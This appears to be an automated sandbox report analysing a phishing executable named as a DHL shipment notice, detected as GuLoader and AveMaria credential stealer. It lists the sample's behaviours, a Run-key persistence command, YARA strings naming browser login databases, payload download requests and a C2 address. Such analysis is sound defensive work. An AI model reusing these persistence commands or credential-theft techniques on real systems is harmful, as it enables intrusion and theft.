Play interactive tour

Edit tour

Windows Analysis Report DHL Express shipment notification.exe

Overview

General Information

Sample Name:	DHL Express shipment notification.exe
Analysis ID:	532143
MD5:	26e034a56f86ed41cb3e869095ec73b7
SHA1:	a74551ce377aadbaae0b31b54b2536daaa832754
SHA256:	60ab75a94e04aa5dfab1a68da060a817e9f5ccb79f8a93d0c3dbfe47cb526b7d
Infos:
Most interesting Screenshot:

Detection

AveMaria GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AveMaria stealer

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Installs a global keyboard hook

Writes to foreign memory regions

Tries to detect Any.run

Increases the number of concurrent connection per server for Internet Explorer

Contains functionality to hide user accounts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory in foreign processes

Injects code into the Windows Explorer (explorer.exe)

Creates an undocumented autostart registry key

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Sigma detected: Direct Autorun Keys Modification

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses reg.exe to modify the Windows registry

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64native

DHL Express shipment notification.exe (PID: 8720 cmdline: "C:\Users\user\Desktop\DHL Express shipment notification.exe" MD5: 26E034A56F86ED41CB3E869095EC73B7)

DHL Express shipment notification.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\DHL Express shipment notification.exe" MD5: 26E034A56F86ED41CB3E869095EC73B7)

explorer.exe (PID: 4856 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

cmd.exe (PID: 8712 cmdline: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

reg.exe (PID: 8620 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

images.exe (PID: 3256 cmdline: C:\ProgramData\images.exe MD5: 26E034A56F86ED41CB3E869095EC73B7)

images.exe (PID: 8428 cmdline: C:\ProgramData\images.exe MD5: 26E034A56F86ED41CB3E869095EC73B7)

cmd.exe (PID: 3288 cmdline: C:\Windows\System32\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downlo8"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000001D.00000000.1167143937.0000000001660000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000E.00000000.738081811.0000000001660000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: DHL Express shipment notification.exe PID: 6632	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: DHL Express shipment notification.exe PID: 6632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: images.exe PID: 8428	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: images.exe PID: 8428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
29.3.images.exe.18d2b78.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x6d98:$a1: \Opera Software\Opera Stable\Login Data 0x70c0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x6a08:$a3: \Google\Chrome\User Data\Default\Login Data
29.3.images.exe.18d2b78.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.3.images.exe.18d2b78.4.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
29.3.images.exe.18d2b78.4.raw.unpack	AveMaria_WarZone	unknown	unknown	0x8e40:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x8b94:$str2: MsgBox.exe 0x8a68:$str6: Ave_Maria 0x8108:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x7728:$str8: SMTP Password 0x6a08:$str11: \Google\Chrome\User Data\Default\Login Data 0x80e0:$str12: \sqlmap.dll
14.3.DHL Express shipment notification.exe.1a02148.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x5e98:$a1: \Opera Software\Opera Stable\Login Data 0x61c0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5b08:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.DHL Express shipment notification.exe.1a02148.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.DHL Express shipment notification.exe.1a02148.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.DHL Express shipment notification.exe.1a02148.0.unpack	AveMaria_WarZone	unknown	unknown	0x7f40:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x7c94:$str2: MsgBox.exe 0x7b68:$str6: Ave_Maria 0x7208:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x6828:$str8: SMTP Password 0x5b08:$str11: \Google\Chrome\User Data\Default\Login Data 0x71e0:$str12: \sqlmap.dll
14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x6a98:$a1: \Opera Software\Opera Stable\Login Data 0x6dc0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x6708:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack	AveMaria_WarZone	unknown	unknown	0x8b40:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x8894:$str2: MsgBox.exe 0x8768:$str6: Ave_Maria 0x7e08:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x7428:$str8: SMTP Password 0x6708:$str11: \Google\Chrome\User Data\Default\Login Data 0x7de0:$str12: \sqlmap.dll
14.3.DHL Express shipment notification.exe.1a02148.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x5e98:$a1: \Opera Software\Opera Stable\Login Data 0x61c0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5b08:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.DHL Express shipment notification.exe.1a02148.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.DHL Express shipment notification.exe.1a02148.4.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.DHL Express shipment notification.exe.1a02148.4.unpack	AveMaria_WarZone	unknown	unknown	0x7f40:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x7c94:$str2: MsgBox.exe 0x7b68:$str6: Ave_Maria 0x7208:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x6828:$str8: SMTP Password 0x5b08:$str11: \Google\Chrome\User Data\Default\Login Data 0x71e0:$str12: \sqlmap.dll
Click to see the 11 entries

Sigma Overview

System Summary:

Sigma detected: Direct Autorun Keys Modification

Show sources

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8712, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", ProcessId: 8620

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000001D.00000000.1167143937.0000000001660000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlo8"}

Multi AV Scanner detection for submitted file

Show sources

Source: DHL Express shipment notification.exe	Virustotal: Detection: 25%			Perma Link
Source: DHL Express shipment notification.exe	ReversingLabs: Detection: 11%

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\images.exe	Virustotal: Detection: 25%			Perma Link
Source: C:\ProgramData\images.exe	ReversingLabs: Detection: 11%

Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 39.2.cmd.exe.4f80000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack	Avira: Label: TR/Patched.Ren.Gen2

Source: DHL Express shipment notification.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49766 version: TLS 1.2

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downlo8

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 93.184.220.29 93.184.220.29
Source: Joe Sandbox View	IP Address: 93.184.220.29 93.184.220.29

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-6k-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0c-74-docs.googleusercontent.comCookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0

Source: global traffic

TCP traffic: 192.168.11.20:49768 -> 194.85.248.156:5200

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9

Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000000F.00000002.5703883842.000000000DA1B000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987919975.000000000DA15000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 0000000F.00000002.5701480202.000000000D849000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.980284348.000000000D267000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.929431409.000000000D267000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.985595787.000000000D7F0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.934050366.000000000D7F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000F.00000002.5703883842.000000000DA1B000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987919975.000000000DA15000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000000F.00000000.936184682.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987848818.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000F.00000000.987919975.000000000DA15000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935114993.000000000D8EB000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000F.00000000.976658395.0000000009B50000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.926660869.000000000A7E0000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.914833980.0000000002FA0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.micro
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.foreca.com
Source: images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322042045.00000000018AA000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330432531.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: explorer.exe, 0000000F.00000000.972782863.00000000094E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.922114611.00000000094E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5684842071.000000000950F000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 0000000F.00000000.936033459.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987676176.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703429729.000000000D9C6000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000F.00000000.936033459.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987676176.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703429729.000000000D9C6000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/g
Source: explorer.exe, 0000000F.00000000.935402531.000000000D954000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000F.00000000.987052343.000000000D954000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5702840793.000000000D954000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935402531.000000000D954000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
